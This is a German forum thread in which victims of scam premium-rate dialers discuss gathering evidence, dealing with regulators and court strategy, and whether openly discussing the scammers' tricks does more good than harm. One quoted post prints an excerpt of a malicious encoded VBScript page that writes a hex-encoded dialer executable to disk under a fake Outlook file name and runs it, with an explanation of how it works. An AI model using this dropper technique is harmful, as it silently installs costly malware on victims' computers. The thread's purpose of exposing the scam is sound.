Dialer Automatisierung
- Ersteller Opfer
- Erstellt am
A
Anonymous
Und weil das so ist, gibt man der RegTP die Quell-URL, wo sie suchen darf und lässt die anderen außen vor. Aber der Dau kann die RegTP dann drauf hinweisen, damit die Datenbank von dem ganzen Müll bereinigt...Total völlig anonyme 'Waldtrau' aus Berlin schrieb:
Re: Hexer ohne .exe
Tja, genau das frage ich mich auch. Da der bei mir eingesetzte Dialer ja eine Selbst-lösch-Funktion hatte, wird das mit dem Beweisen schwer. Deswegen bin ich daran das ganze zu rekonstruieren, und vergleichbare Seiten aufzuzeigen.
Opfer
johinos schrieb:
Tja, genau das frage ich mich auch. Da der bei mir eingesetzte Dialer ja eine Selbst-lösch-Funktion hatte, wird das mit dem Beweisen schwer. Deswegen bin ich daran das ganze zu rekonstruieren, und vergleichbare Seiten aufzuzeigen.
Opfer
Der Jurist
Teammitglied
plext@r schrieb:
Du etwa ?
Pl@xter schrieb:
Also konstruktive Kritik ist hier selbstverständlich willkommen. Wenn Dir was besseres einfällt, als die Füßchen stille zu halten und sich die Taschen entleeren zu lassen, dann würde das den einen oder anderen hier sicher interessieren. Um gar zu sagen: Dann bist Du hier in diesem Forum genau richtig.
A
Anonymous
Den Hinweis von Plet@r würde ich auch ganz gern mal kommentieren:
gerade in letzter Zeit legen die Forenmitglieder ganz schön an Professionalität zu - d. h. die Art und Weise der "Gewinnoptimierung" wird immer öfter behelligt.
Nun gibt es jedoch verschiedene Arten und Möglichkeiten, sich auf dem Dialergebiet eine goldene Nase zu verdienen. Jedes Detail einzelner Varianten, dass hier für die erfolgreiche Abzocke explizit offen dargestellt wird, genügt den mitlesenden Initaitoren der Dialerlique, ihre Arbeitsweise den Marterfordernissen (und vor allem der behördlichen Ermittlungen, die u. U. gegen sie laufen) anzupassen.
__________________________________________
Vom Terrorismus zum Aktionismus, oder - wie sich unterschiedliche Betrachtungsweisen in einen Topf schmeißen lassen.
gerade in letzter Zeit legen die Forenmitglieder ganz schön an Professionalität zu - d. h. die Art und Weise der "Gewinnoptimierung" wird immer öfter behelligt.
Nun gibt es jedoch verschiedene Arten und Möglichkeiten, sich auf dem Dialergebiet eine goldene Nase zu verdienen. Jedes Detail einzelner Varianten, dass hier für die erfolgreiche Abzocke explizit offen dargestellt wird, genügt den mitlesenden Initaitoren der Dialerlique, ihre Arbeitsweise den Marterfordernissen (und vor allem der behördlichen Ermittlungen, die u. U. gegen sie laufen) anzupassen.
__________________________________________
Vom Terrorismus zum Aktionismus, oder - wie sich unterschiedliche Betrachtungsweisen in einen Topf schmeißen lassen.
A
Anonymous
Re: Hü oder Hott?
@Jo - leider sitzen die wenigsten nealy Stadelheim, weshalb sich auch das Posting erst ergeben hatte.
Insbesondere bitte ich freundlichst zur Kennntis zu nehmen, dass man sowohl auf Mallorca, als auch in Holland oder sonstewo, diesem Forum Aufmerksamkeit zollt.
Genau so meinte ich das!johinos schrieb:
@Jo - leider sitzen die wenigsten nealy Stadelheim, weshalb sich auch das Posting erst ergeben hatte.
Insbesondere bitte ich freundlichst zur Kennntis zu nehmen, dass man sowohl auf Mallorca, als auch in Holland oder sonstewo, diesem Forum Aufmerksamkeit zollt.
Qoppa
Mitglied
Daß diese Informationen hier kontraproduktiv sind, kann ich nicht glauben. Wenn die Mißbrauchsmöglichkeiten immer besser dokumentiert und damit immer weiter bekannt werden, kann das nur nutzen. Das Angenehme an einem Rechtsstaat ist ja, daß die Entscheidung letztlich vor Gericht fällt. Wenn die Gerichte die Manipulationsmöglichkeiten in ihrer Tragweite erfassen, heißt das, daß immer weniger mehrwertdienstfreundliche Urteile ergehen werden (--> Beweislastumkehr, --> Vertragsabschluß muß nachgewiesen, was i. d. R. unmöglich ist).
Ich glaube ja nicht an "legale" und "gesetzeskonforme" Dialer. Wenn alles manipuliert werden kann, heißt das, man kann x-mal "OK drücken" vorschreiben, sogar Passwort und sonstwas, - wenn die Richter das endlich verstehen, werden sie´s nicht als Beweis eines Vertragsabschlußes anerkennen, und dann:
GOOD BYE MEHRWERTDIENSTE!
Ich glaube ja nicht an "legale" und "gesetzeskonforme" Dialer. Wenn alles manipuliert werden kann, heißt das, man kann x-mal "OK drücken" vorschreiben, sogar Passwort und sonstwas, - wenn die Richter das endlich verstehen, werden sie´s nicht als Beweis eines Vertragsabschlußes anerkennen, und dann:
GOOD BYE MEHRWERTDIENSTE!
A
Anonymous
Der Genervte schrieb:
Qoppa
Mitglied
Vielleicht, - aber es ist auch nur "in the long run" gemeint.
Wenn denn das normale BGB auch im Internet und bei den Mehrwertdiensten Einzug hält, MUSS dies allerdings das Ergebnis sein: denn dann muß der Verkäufer/Dienstanbieter seine Leistungen nachweisen. Ein notorisch manipulationsbehaftetes Verkaufssystem wird das nicht leisten können - in the long run, versteht sich.
Das ist im Grunde das letztlich doch beruhigende Fazit (bei allem Stress, der auf dem Weg dorthin liegt), das ich aus der Lektüre der vielen Diskussionen hier ziehe. Aber in ein paar Jahren mögen die Betrüger dann ganz andere Spielwiesen gefunden haben ... Die menschliche Niedertracht stirbt nicht aus, - aber man kann und sollte und muß sie bekämpfen. Und wenn man das, wie hier, noch mit einem gewissen intellektuellen Vergnügen verbinden kann ---
Wenn denn das normale BGB auch im Internet und bei den Mehrwertdiensten Einzug hält, MUSS dies allerdings das Ergebnis sein: denn dann muß der Verkäufer/Dienstanbieter seine Leistungen nachweisen. Ein notorisch manipulationsbehaftetes Verkaufssystem wird das nicht leisten können - in the long run, versteht sich.
Das ist im Grunde das letztlich doch beruhigende Fazit (bei allem Stress, der auf dem Weg dorthin liegt), das ich aus der Lektüre der vielen Diskussionen hier ziehe. Aber in ein paar Jahren mögen die Betrüger dann ganz andere Spielwiesen gefunden haben ... Die menschliche Niedertracht stirbt nicht aus, - aber man kann und sollte und muß sie bekämpfen. Und wenn man das, wie hier, noch mit einem gewissen intellektuellen Vergnügen verbinden kann ---
cicojaka
Mitglied
Qoppa schrieb:
Das ist wohl eine Strategiedebatte. Schade, dass man die nicht nicht-öffentlich führen kann
Es ist eher ein Feldexperiment mit unsicherem Ausgang und es macht mir viel Kopfzerbrechen, mich evtl. aktiv an einer Strategie zu beteiligen, die sich als kontraproduktiv erweisen könnte.
Ich neige dazu, Qoppas Theorie zu befürworten, trotz Annas Bedenken, die ich aber nicht ganz vom Tisch wischen kann und will. Ich denke, dass keiner sagen kann, wie es besser ist.
Oder sollte man hier nichts mehr schreiben und alles der RegTP überlassen? Hmm, wenn ich's nur wüsste...
Der Jurist
Teammitglied
Zur Strategie-Debatte:
Ich gehe davon aus, dass hier im Forum die Diskussion immer nachlaufend ist. Also ein oder mehrere Mehrwerdienstanbieter haben die hier diskutierten Tricks bereits eingesetzt.
Wenn dem so ist, kann man niemand mehr auf dumme Gedanken bringen, weil es bereits geschehen ist.
Zwar ist es möglich, dass in einer kurzen Übergangszeit, der Trick noch funktioniert, weil eine Gegenstrategie noch nicht ausgereift ist.
Aber anderseits muss jeder Mehrwertdienstanbieter damit rechnen, dass sein Trick bereits nicht mehr zieht, wenn er vor dem Amtsgericht seine angebliche Forderung geltend machen will.
Aus diesem Grund bin ich weiter für eine offene Diskussion. Der Nutzen überwiegt die Nachteile bei weitem.
Allerdings gilt dies vorallem für die zivilrechtliche Auseinandersetzung.
Da die meisten Betroffenen in erster Linie ein zivilrechtliches Problem haben, muss dies im Vordergrund stehen.
Die strafrechtliche Seite habe die ermittelnden Stellen selber im Griff oder sollten sie zumindest haben.
Nutzer, die von Ermittlungsbehörden um Zurückhaltung gebeten werden, werde diese sicherlich für eine bestimmte Zeit auch üben.
Damit muss es aber vorbei sein, wenn es darum geht den Zivilprozeß zu gewinnen.
Ich gehe davon aus, dass hier im Forum die Diskussion immer nachlaufend ist. Also ein oder mehrere Mehrwerdienstanbieter haben die hier diskutierten Tricks bereits eingesetzt.
Wenn dem so ist, kann man niemand mehr auf dumme Gedanken bringen, weil es bereits geschehen ist.
Zwar ist es möglich, dass in einer kurzen Übergangszeit, der Trick noch funktioniert, weil eine Gegenstrategie noch nicht ausgereift ist.
Aber anderseits muss jeder Mehrwertdienstanbieter damit rechnen, dass sein Trick bereits nicht mehr zieht, wenn er vor dem Amtsgericht seine angebliche Forderung geltend machen will.
Aus diesem Grund bin ich weiter für eine offene Diskussion. Der Nutzen überwiegt die Nachteile bei weitem.
Allerdings gilt dies vorallem für die zivilrechtliche Auseinandersetzung.
Da die meisten Betroffenen in erster Linie ein zivilrechtliches Problem haben, muss dies im Vordergrund stehen.
Die strafrechtliche Seite habe die ermittelnden Stellen selber im Griff oder sollten sie zumindest haben.
Nutzer, die von Ermittlungsbehörden um Zurückhaltung gebeten werden, werde diese sicherlich für eine bestimmte Zeit auch üben.
Damit muss es aber vorbei sein, wenn es darum geht den Zivilprozeß zu gewinnen.
A
Anonymous
Der Jurist schrieb:
Also mal angenommen, ich würde auf einer Internetseite beschreiben, wie Herr X aus Y mit einem Trick 10.000 Kunden der Z-Bank um jeweils 100 Euro betrogen hat. Schaden: 1 Million. Würden dann die Ermittler von sich aus aktiv werden, oder müsste jemand Herrn X anschwärzen? Oder würden die sagen, das ist eine Sache der jeweils einzeln Betroffenen?
f.
Der Jurist
Teammitglied
Anonymous schrieb:
Darum ging es in meinem Posting nicht. Selbstverständlich können Ermittler nur ermitteln, wenn sie wissen, dass es etwas zu ermitteln gibt.
Strafanzeigen helfen hier ungemein, auch wenn sie eigentlich von Amts wegen ermitteln müssten.
Allerdings, wenn es darum geht, Informationen nicht zu verbreiten, damit die Ermittler weiter ermitteln können, dann sollte man auf diesen Wunsch eingehen, es sei denn man gefährdet seinen eigenen Erfolg im Zivilprozess.
Wegen des Erfolgs im eigenen Zivilprozess kann es unerlässlich sein, dass man sich mit anderen Geschädigten austauscht.
cicojaka
Mitglied
Opfer schrieb:Oki, neue Erkentnisse:
Die Dialer sind in manchen Fällen offenbar gar nicht als *.exe Datei auf einem Server abgelegt, sondern kommen "als Hex-Code daher". Das bedeuted konkret:
Eine Seite (ab und zu VBscript verschlüsselt - huhh...jetzt bekomm ich aber Angst) enthällt z.B folgenden Content (Auszug):
<html>
<script language="VBScript.Encode">
self.MoveTo 5000,5000
szZeroLine = "00000000000000000000000000000000000000000"
szBinary = ""
szBinary = szBinary & "4D5A90000300000004000000FFFF0000B8000000000000004000"
szBinary = szBinary & "000000000000000000000000D80000000E1FBA0E00B409CD21B"
szBinary = szBinary & "742062652072756E20696E20444F53206D6F64652E0D0D0A2400"
...
szApplication = "c:\Progra~1\Outloo~1\outl32c.exe"
Set hFSO = CreateObject("Scripting.FileSystemObject")
if not hFSO.FileExists(szApplication) Then
Set hFile = hFSO.CreateTextFile(szApplication, ForWriting)
Was passiert hier nun ? Eigentlich ist das ganz einfach: Die *.exe Datei wird auf den Computer "geschrieben". Wenn man eine beliebige *.exe Datei mal mit einem Hex-Editor öffnet, dann sieht man viele viele Hexcodes (z.B 4D5A..). Diese codes zusammen ergeben das komplette Programm. Über das FileScriptingObject kann man eine Webseite nun dazu bringen, eben diesen Inhalt als neue Datei auf den Rechner zu schreiben. Wenn ein Dialer z.B mit einem EXE Packert gepackt wurde (UPX wird offenbar sehr gerne benutzt - kost ja nix), wird die so klein, das man das ganze Programm bequem in eine Webseite packen kann (Als Beispiel der DDialer.exe = 68kb wäre also kein Problem zu realisieren). Auf diese Art und Weise (und ich denke bei mir war es der Fall) kommt die *.exe gar nicht per Download auf den Rechner, sondern wird dort erstellt ! Praktischerweisse, kann der dann auch gleich gestartet werden (mittels dem Befehl: hShell.run(szApplication)).
Wieder ein mal ein schönes Beispiel dafür was sich die Jungs doch alles einfallen lassen um an unser Geld zu kommen :/
Opfer
Da ich mitverantwortlich dafür bin, dass dieser Faden etwas verwickelt wurde
möchte ich diesen interessanten Beitrag komplett zitieren, ihn inhaltlich unterschreiben und die Frage stellen: Was passiert da nun genau? Wie viel Rechte kriegt jemand durch ein Sicherheitszertifikat? Kann der alles bei mir machen oder gibt es da irgendwelche Grenzen? Was ist dieses Sicherheitszertifikat wert?